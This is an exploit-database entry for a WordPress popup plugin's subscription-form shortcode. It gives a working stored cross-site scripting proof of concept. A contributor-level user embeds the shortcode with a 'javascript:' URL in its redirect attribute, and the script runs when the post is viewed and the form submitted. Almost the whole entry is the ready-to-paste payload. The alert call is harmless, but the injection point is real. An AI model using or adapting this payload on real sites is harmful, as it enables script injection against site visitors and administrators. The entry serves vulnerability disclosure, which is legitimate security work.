Share
## https://sploitus.com/exploit?id=WPEX-ID:8BF8EBE8-1063-492D-A0F9-2F824408D0DF
As a contributor, put the following shortcode in a post/page

[pum_sub_form name_field_type="fullname" label_name="Name" label_email="Email" label_submit="Subscribe" placeholder_name="Name" placeholder_email="Email" form_layout="block" form_alignment="center" form_style="default" privacy_consent_enabled="yes" privacy_consent_label="Notify me about related content and special offers." privacy_consent_type="radio" privacy_consent_radio_layout="inline" privacy_consent_yes_label="Yes" privacy_consent_no_label="No" privacy_usage_text="If you opt in above we use this information send related content, discounts and other special offers." redirect_enabled redirect="javascript:alert(/XSS/)"] 

The XSS will be triggered when previewing/viewing the post/page and submitting the form